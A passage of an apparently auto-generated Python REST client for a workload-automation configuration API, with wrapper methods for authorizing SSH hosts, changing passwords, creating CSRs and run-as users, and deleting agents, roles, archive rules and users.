        raise ValueError("Missing the required parameter `server` when calling `authorize_mft_ssh_host`")  # noqa: E501
    # verify the required parameter 'agent' is set
    if ('agent' not in params or
            params['agent'] is None):
        raise ValueError("Missing the required parameter `agent` when calling `authorize_mft_ssh_host`")  # noqa: E501
    # verify the required parameter 'hostname' is set
    if ('hostname' not in params or
            params['hostname'] is None):
        raise ValueError("Missing the required parameter `hostname` when calling `authorize_mft_ssh_host`")  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'server' in params:
        path_params['server'] = params['server']  # noqa: E501
    if 'agent' in params:
        path_params['agent'] = params['agent']  # noqa: E501
    if 'hostname' in params:
        path_params['hostname'] = params['hostname']  # noqa: E501

    # Optional port travels as a query parameter, not in the path.
    query_params = []
    if 'port' in params:
        query_params.append(('port', params['port']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    # No request body for this endpoint.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    # Dispatch the REST call through the shared ApiClient.
    return self.api_client.call_api(
        '/config/server/{server}/agent/{agent}/mft/ssh/host/{hostname}', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def authorize_ssh_known_remotehost(self, server, remotehost, **kwargs):  # noqa: E501
    """Authorize  # noqa: E501

    Authorized known ssh remote host.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.authorize_ssh_known_remotehost(server, remotehost, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server the remote host is connected to. (required)
    :param str remotehost: The name of the remote host. (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper only want the deserialized
    # payload, so force the data-only flag before delegating.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        return self.authorize_ssh_known_remotehost_with_http_info(server, remotehost, **kwargs)  # noqa: E501
    # Synchronous path: unwrap and hand back the response data.
    response = self.authorize_ssh_known_remotehost_with_http_info(server, remotehost, **kwargs)  # noqa: E501
    return response
def authorize_ssh_known_remotehost_with_http_info(self, server, remotehost, **kwargs):  # noqa: E501
    """Authorize  # noqa: E501
    Authorized known ssh remote host.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.authorize_ssh_known_remotehost_with_http_info(server, remotehost, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str server: The Server the remote host is connected to. (required)
    :param str remotehost: The name of the remote host. (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['server', 'remotehost']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the current local names (self plus the positional args and
    # kwargs) so that all parameters can be consumed uniformly by name
    # below; this must run before any other local is introduced.
    params = locals()
    # Reject unknown keyword arguments; fold accepted ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method authorize_ssh_known_remotehost" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'server' is set
    if ('server' not in params or
            params['server'] is None):
        raise ValueError("Missing the required parameter `server` when calling `authorize_ssh_known_remotehost`")  # noqa: E501
    # verify the required parameter 'remotehost' is set
    if ('remotehost' not in params or
            params['remotehost'] is None):
        raise ValueError("Missing the required parameter `remotehost` when calling `authorize_ssh_known_remotehost`")  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'server' in params:
        path_params['server'] = params['server']  # noqa: E501
    if 'remotehost' in params:
        path_params['remotehost'] = params['remotehost']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # No request body for this endpoint.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    # Dispatch the REST call through the shared ApiClient.
    return self.api_client.call_api(
        '/config/server/{server}/remotehost/{remotehost}/authorize', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def change_user_password(self, user, **kwargs):  # noqa: E501
    """Change user password  # noqa: E501

    Change user password  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.change_user_password(user, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str user: user name (required)
    :param UserPassword body: The new password.
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper only want the deserialized
    # payload, so force the data-only flag before delegating.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        return self.change_user_password_with_http_info(user, **kwargs)  # noqa: E501
    # Synchronous path: unwrap and hand back the response data.
    response = self.change_user_password_with_http_info(user, **kwargs)  # noqa: E501
    return response
def change_user_password_with_http_info(self, user, **kwargs):  # noqa: E501
    """Change user password  # noqa: E501
    Change user password  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.change_user_password_with_http_info(user, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str user: user name (required)
    :param UserPassword body: The new password.
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    # 'body' (the new password payload) is an accepted optional keyword.
    all_params = ['user', 'body']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the current local names (self, user, kwargs) so that all
    # parameters can be consumed uniformly by name below; this must run
    # before any other local is introduced.
    params = locals()
    # Reject unknown keyword arguments; fold accepted ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method change_user_password" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'user' is set
    if ('user' not in params or
            params['user'] is None):
        raise ValueError("Missing the required parameter `user` when calling `change_user_password`")  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'user' in params:
        path_params['user'] = params['user']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['*/*'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    # Dispatch the REST call through the shared ApiClient.
    return self.api_client.call_api(
        '/config/user/{user}/password/adminUpdate', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def create_agent_certificate_signing_request(self, body, server, agent, **kwargs):  # noqa: E501
    """Create certificate signing request (CSR).  # noqa: E501

    Create certificate signing request (CSR) on SSL configured Agent.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.create_agent_certificate_signing_request(body, server, agent, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param CertificateSigningRequestData body: Certificate Signing Request (CSR) data (required)
    :param str server: The Server. (required)
    :param str agent: The Agent. (required)
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper only want the deserialized
    # payload, so force the data-only flag before delegating.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        return self.create_agent_certificate_signing_request_with_http_info(body, server, agent, **kwargs)  # noqa: E501
    # Synchronous path: unwrap and hand back the response data.
    response = self.create_agent_certificate_signing_request_with_http_info(body, server, agent, **kwargs)  # noqa: E501
    return response
def create_agent_certificate_signing_request_with_http_info(self, body, server, agent, **kwargs):  # noqa: E501
    """Create certificate signing request (CSR).  # noqa: E501
    Create certificate signing request (CSR) on SSL configured Agent.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.create_agent_certificate_signing_request_with_http_info(body, server, agent, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param CertificateSigningRequestData body: Certificate Signing Request (CSR) data (required)
    :param str server: The Server. (required)
    :param str agent: The Agent. (required)
    :return: str
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['body', 'server', 'agent']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the current local names (self plus the positional args and
    # kwargs) so that all parameters can be consumed uniformly by name
    # below; this must run before any other local is introduced.
    params = locals()
    # Reject unknown keyword arguments; fold accepted ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_agent_certificate_signing_request" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `create_agent_certificate_signing_request`")  # noqa: E501
    # verify the required parameter 'server' is set
    if ('server' not in params or
            params['server'] is None):
        raise ValueError("Missing the required parameter `server` when calling `create_agent_certificate_signing_request`")  # noqa: E501
    # verify the required parameter 'agent' is set
    if ('agent' not in params or
            params['agent'] is None):
        raise ValueError("Missing the required parameter `agent` when calling `create_agent_certificate_signing_request`")  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'server' in params:
        path_params['server'] = params['server']  # noqa: E501
    if 'agent' in params:
        path_params['agent'] = params['agent']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    # This endpoint can also return the CSR as plain text.
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json', 'text/plain'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['*/*'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    # Dispatch the REST call through the shared ApiClient; the response
    # deserializes to a plain string (the CSR), not a model object.
    return self.api_client.call_api(
        '/config/server/{server}/agent/{agent}/csr', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def create_run_as_user(self, body, server, **kwargs):  # noqa: E501
    """Add a new Run-as user  # noqa: E501

    Add a new Run-as user to server.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.create_run_as_user(body, server, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param RunAsUserData body: Run as user data (required)
    :param str server: The Server. (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper only want the deserialized
    # payload, so force the data-only flag before delegating.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        return self.create_run_as_user_with_http_info(body, server, **kwargs)  # noqa: E501
    # Synchronous path: unwrap and hand back the response data.
    response = self.create_run_as_user_with_http_info(body, server, **kwargs)  # noqa: E501
    return response
def create_run_as_user_with_http_info(self, body, server, **kwargs):  # noqa: E501
    """Add a new Run-as user  # noqa: E501
    Add a new Run-as user to server.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.create_run_as_user_with_http_info(body, server, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param RunAsUserData body: Run as user data (required)
    :param str server: The Server. (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['body', 'server']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the current local names (self, body, server, kwargs) so
    # that all parameters can be consumed uniformly by name below; this
    # must run before any other local is introduced.
    params = locals()
    # Reject unknown keyword arguments; fold accepted ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_run_as_user" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `create_run_as_user`")  # noqa: E501
    # verify the required parameter 'server' is set
    if ('server' not in params or
            params['server'] is None):
        raise ValueError("Missing the required parameter `server` when calling `create_run_as_user`")  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'server' in params:
        path_params['server'] = params['server']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['*/*'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    # Dispatch the REST call through the shared ApiClient.
    return self.api_client.call_api(
        '/config/server/{server}/runasuser', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def delete_agent(self, server, agent, **kwargs):  # noqa: E501
    """delete an agent from Server  # noqa: E501

    Delete an agent from a Server. This will not shut the agent down. It only disconnects and removes it from the list.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_agent(server, agent, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server the agent is connected to. (required)
    :param str agent: The name of the agent to delete. (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper only ever needs the response body, not the
    # full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # With async_req the helper returns a request thread, otherwise the
    # deserialized data -- either way it is handed straight to the caller.
    return self.delete_agent_with_http_info(server, agent, **kwargs)  # noqa: E501
def delete_agent_with_http_info(self, server, agent, **kwargs):  # noqa: E501
    """delete an agent from Server  # noqa: E501

    Delete an agent from a Server. This will not shut the agent down. It only disconnects and removes it from the list.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_agent_with_http_info(server, agent, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server the agent is connected to. (required)
    :param str agent: The name of the agent to delete. (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts beyond its positionals.
    accepted = ['server', 'agent', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_agent" % key
            )
    params = dict(kwargs)
    params['server'] = server
    params['agent'] = agent

    # Both path parameters are mandatory.
    if params.get('server') is None:
        raise ValueError("Missing the required parameter `server` when calling `delete_agent`")  # noqa: E501
    if params.get('agent') is None:
        raise ValueError("Missing the required parameter `agent` when calling `delete_agent`")  # noqa: E501

    path_params = {
        'server': params['server'],  # noqa: E501
        'agent': params['agent'],  # noqa: E501
    }

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/server/{server}/agent/{agent}', 'DELETE',
        path_params,
        [],  # query_params
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def delete_archive_rule(self, rule_name, delete_rule_data_flag, **kwargs):  # noqa: E501
    """Delete Workload Archiving rule  # noqa: E501

    Deletes Workload Archiving rule by name. It is required to send deleteRuleData flag to specify if rule need to be deleted with all the collected data or deleteRuleWithoutData otherwise.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_archive_rule(rule_name, delete_rule_data_flag, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str rule_name: Rule name to delete (required)
    :param str delete_rule_data_flag: Remove rule with collected data or without. REQUIRED. (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper only ever needs the response body, not the
    # full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # With async_req the helper returns a request thread, otherwise the
    # deserialized data -- either way it is handed straight to the caller.
    return self.delete_archive_rule_with_http_info(rule_name, delete_rule_data_flag, **kwargs)  # noqa: E501
def delete_archive_rule_with_http_info(self, rule_name, delete_rule_data_flag, **kwargs):  # noqa: E501
    """Delete Workload Archiving rule  # noqa: E501

    Deletes Workload Archiving rule by name. It is required to send deleteRuleData flag to specify if rule need to be deleted with all the collected data or deleteRuleWithoutData otherwise.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_archive_rule_with_http_info(rule_name, delete_rule_data_flag, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str rule_name: Rule name to delete (required)
    :param str delete_rule_data_flag: Remove rule with collected data or without. REQUIRED. (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts beyond its positionals.
    accepted = ['rule_name', 'delete_rule_data_flag', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_archive_rule" % key
            )
    params = dict(kwargs)
    params['rule_name'] = rule_name
    params['delete_rule_data_flag'] = delete_rule_data_flag

    # Both the rule name and the data-deletion flag are mandatory.
    if params.get('rule_name') is None:
        raise ValueError("Missing the required parameter `rule_name` when calling `delete_archive_rule`")  # noqa: E501
    if params.get('delete_rule_data_flag') is None:
        raise ValueError("Missing the required parameter `delete_rule_data_flag` when calling `delete_archive_rule`")  # noqa: E501

    path_params = {
        'ruleName': params['rule_name'],  # noqa: E501
    }
    # The flag travels as a query parameter, not in the path.
    query_params = [
        ('deleteRuleDataFlag', params['delete_rule_data_flag']),  # noqa: E501
    ]

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/archive/rule/{ruleName}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def delete_authorization_role(self, role, **kwargs):  # noqa: E501
    """Delete Authorization Role  # noqa: E501

    Delete Authorization Role  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_authorization_role(role, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str role: The Role name. (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper only ever needs the response body, not the
    # full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # With async_req the helper returns a request thread, otherwise the
    # deserialized data -- either way it is handed straight to the caller.
    return self.delete_authorization_role_with_http_info(role, **kwargs)  # noqa: E501
def delete_authorization_role_with_http_info(self, role, **kwargs):  # noqa: E501
    """Delete Authorization Role  # noqa: E501

    Delete Authorization Role  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_authorization_role_with_http_info(role, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str role: The Role name. (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts beyond its positionals.
    accepted = ['role', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_authorization_role" % key
            )
    params = dict(kwargs)
    params['role'] = role

    # The role path parameter is mandatory.
    if params.get('role') is None:
        raise ValueError("Missing the required parameter `role` when calling `delete_authorization_role`")  # noqa: E501

    path_params = {
        'role': params['role'],  # noqa: E501
    }

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/authorization/role/{role}', 'DELETE',
        path_params,
        [],  # query_params
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def delete_external_user(self, username, **kwargs):  # noqa: E501
    """Delete an external user  # noqa: E501

    Delete an existing external user in MFT  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_external_user(username, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str username: The name of the external user to delete (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper only ever needs the response body, not the
    # full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # With async_req the helper returns a request thread, otherwise the
    # deserialized data -- either way it is handed straight to the caller.
    return self.delete_external_user_with_http_info(username, **kwargs)  # noqa: E501
def delete_external_user_with_http_info(self, username, **kwargs):  # noqa: E501
    """Delete an external user  # noqa: E501

    Delete an existing external user in MFT  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_external_user_with_http_info(username, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str username: The name of the external user to delete (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts beyond its positionals.
    accepted = ['username', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_external_user" % key
            )
    params = dict(kwargs)
    params['username'] = username

    # The username path parameter is mandatory.
    if params.get('username') is None:
        raise ValueError("Missing the required parameter `username` when calling `delete_external_user`")  # noqa: E501

    path_params = {
        'username': params['username'],  # noqa: E501
    }

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/mft/externaluser/{username}', 'DELETE',
        path_params,
        [],  # query_params
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def delete_external_user_or_user_group_from_mft_folder(self, folder_name, user_or_group, **kwargs):  # noqa: E501
    """Remove an external user or user group from an existing virtual folder in MFT.  # noqa: E501

    Remove an external user or user group from an existing virtual folder in MFT.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_external_user_or_user_group_from_mft_folder(folder_name, user_or_group, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str folder_name: Name of folder (required)
    :param str user_or_group: The user name (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper only ever needs the response body, not the
    # full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # With async_req the helper returns a request thread, otherwise the
    # deserialized data -- either way it is handed straight to the caller.
    return self.delete_external_user_or_user_group_from_mft_folder_with_http_info(folder_name, user_or_group, **kwargs)  # noqa: E501
def delete_external_user_or_user_group_from_mft_folder_with_http_info(self, folder_name, user_or_group, **kwargs):  # noqa: E501
    """Remove an external user or user group from an existing virtual folder in MFT.  # noqa: E501

    Remove an external user or user group from an existing virtual folder in MFT.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_external_user_or_user_group_from_mft_folder_with_http_info(folder_name, user_or_group, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str folder_name: Name of folder (required)
    :param str user_or_group: The user name (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts beyond its positionals.
    accepted = ['folder_name', 'user_or_group', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_external_user_or_user_group_from_mft_folder" % key
            )
    params = dict(kwargs)
    params['folder_name'] = folder_name
    params['user_or_group'] = user_or_group

    # Both path parameters are mandatory.
    if params.get('folder_name') is None:
        raise ValueError("Missing the required parameter `folder_name` when calling `delete_external_user_or_user_group_from_mft_folder`")  # noqa: E501
    if params.get('user_or_group') is None:
        raise ValueError("Missing the required parameter `user_or_group` when calling `delete_external_user_or_user_group_from_mft_folder`")  # noqa: E501

    path_params = {
        'folderName': params['folder_name'],  # noqa: E501
        'userOrGroup': params['user_or_group'],  # noqa: E501
    }

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/mft/virtualfolder/{folderName}/user/{userOrGroup}', 'DELETE',
        path_params,
        [],  # query_params
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def delete_host_from_group(self, server, hostgroup, host, **kwargs):  # noqa: E501
    """delete an agent from a hostgroup  # noqa: E501

    Delete an agent from the specified hostgroup. If the group is empty it will also be deleted.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_host_from_group(server, hostgroup, host, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server the hostgroup belongs to. (required)
    :param str hostgroup: The hostgroup name (required)
    :param str host: The agent to be deleted (required)
    :return: AgentsInGroupSuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper only ever needs the response body, not the
    # full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # With async_req the helper returns a request thread, otherwise the
    # deserialized data -- either way it is handed straight to the caller.
    return self.delete_host_from_group_with_http_info(server, hostgroup, host, **kwargs)  # noqa: E501
def delete_host_from_group_with_http_info(self, server, hostgroup, host, **kwargs):  # noqa: E501
    """delete an agent from a hostgroup  # noqa: E501

    Delete an agent from the specified hostgroup. If the group is empty it will also be deleted.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_host_from_group_with_http_info(server, hostgroup, host, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server the hostgroup belongs to. (required)
    :param str hostgroup: The hostgroup name (required)
    :param str host: The agent to be deleted (required)
    :return: AgentsInGroupSuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts beyond its positionals.
    accepted = ['server', 'hostgroup', 'host', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_host_from_group" % key
            )
    params = dict(kwargs)
    params['server'] = server
    params['hostgroup'] = hostgroup
    params['host'] = host

    # All three path parameters are mandatory.
    if params.get('server') is None:
        raise ValueError("Missing the required parameter `server` when calling `delete_host_from_group`")  # noqa: E501
    if params.get('hostgroup') is None:
